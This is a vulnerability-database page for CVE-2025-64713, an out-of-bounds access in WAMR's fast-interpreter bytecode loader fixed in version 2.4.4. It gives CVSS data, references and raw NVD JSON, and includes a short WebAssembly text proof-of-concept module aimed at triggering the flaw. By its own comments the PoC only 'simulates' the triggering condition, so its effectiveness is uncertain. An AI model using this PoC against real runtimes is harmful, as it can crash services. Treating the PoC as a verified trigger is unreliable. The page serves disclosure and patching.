Security Vulnerability Report
CVE-2025-64713 CVSS 5.1 MEDIUM

CVE-2025-64713

Published: 2025-11-25 23:15:48
Last Modified: 2025-12-03 18:45:41

Description

WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, an out-of-bounds array access issue exists in WAMR's fast interpreter mode during WASM bytecode loading. When frame_ref_bottom and frame_offset_bottom arrays are at capacity and a GET_GLOBAL(I32) opcode is encountered, frame_ref_bottom is expanded but frame_offset_bottom may not be. If this is immediately followed by an if opcode that triggers preserve_local_for_block, the function traverses arrays using stack_cell_num as the upper bound, causing out-of-bounds access to frame_offset_bottom since it wasn't expanded to match the increased stack_cell_num. This issue has been patched in version 2.4.4.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:*:*:*:*:*:*:*:* - VULNERABLE
WAMR < 2.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
wat
;; PoC for CVE-2025-64713: WAMR Out-of-Bounds Array Access
;; This PoC generates a malicious WASM bytecode that triggers the vulnerability
;; Compile with: wat2wasm poc.wat -o poc.wasm
(module
  (func $trigger_oob (result i32)
    ;; Fill local slots to capacity (simulate condition)
    (local i32) (local i32) (local i32) (local i32)
    (local i32) (local i32) (local i32) (local i32)
    (local i32) (local i32) (local i32) (local i32)
    ;; Get global to trigger uneven array expansion
    (global.get 0)
    ;; Use if block to trigger preserve_local_for_block
    ;; This will cause OOB access on frame_offset_bottom
    (if (result i32)
      (then (local.get 0))
      (else (i32.const 0))
    )
  )
  (global i32 (i32.const 0))
)

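References

https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4 (Release Notes)
https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-gvx3-gg3x-rjcx (Exploit, Vendor Advisory)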

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64713", "sourceIdentifier": "[email protected]", "published": "2025-11-25T23:15:47.763", "lastModified": "2025-12-03T18:45:40.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, an out-of-bounds array access issue exists in WAMR's fast interpreter mode during WASM bytecode loading. When frame_ref_bottom and frame_offset_bottom arrays are at capacity and a GET_GLOBAL(I32) opcode is encountered, frame_ref_bottom is expanded but frame_offset_bottom may not be. If this is immediately followed by an if opcode that triggers preserve_local_for_block, the function traverses arrays using stack_cell_num as the upper bound, causing out-of-bounds access to frame_offset_bottom since it wasn't expanded to match the increased stack_cell_num. This issue has been patched in version 2.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", 
"description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.4", "matchCriteriaId": "FC2929DB-4D93-47DC-BA0C-10BAE8760C2B"}]}]}], "references": [{"url": "https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-gvx3-gg3x-rjcx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}